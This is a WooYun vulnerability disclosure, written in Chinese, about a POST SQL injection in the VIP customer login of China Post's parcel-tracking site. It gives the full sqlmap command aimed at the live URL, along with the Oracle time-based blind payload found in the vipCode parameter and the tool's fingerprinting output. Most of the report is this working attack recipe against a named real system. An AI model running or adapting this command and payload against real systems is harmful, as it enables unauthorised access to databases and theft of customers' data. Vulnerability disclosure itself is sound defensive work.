WooYun.org

http://chinapost.com.cn/
主页有处邮政包裹查询，点击跳转到
http://yjcx.chinapost.com.cn/

选择大客户查询，跳转到http://yjcx.chinapost.com.cn/vipcustom.do?action=vipLogin
该url存在post注入
随便输一下账户密码，抓一下包

sqlmap.py -u "http://yjcx.chinapost.com.cn/vipcustom.do?action=vipLoginVal" --data "vipCode=123456&password=123456&code=8116"

vipCode参数存在注入
---
Place: POST
Parameter: vipCode
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: vipCode=123456' AND 9654=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(111
)||CHR(107)||CHR(80),5) AND 'JdvD'='JdvD&password=123456&code=8116
---
[12:58:51] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.4, JSP, JSP 2.0
back-end DBMS: Oracle
[12:58:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[12:58:51] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\yjcx.chinapost.com.cn'
数据库：

由于表太多，且我速度又慢，就不继续跑下去了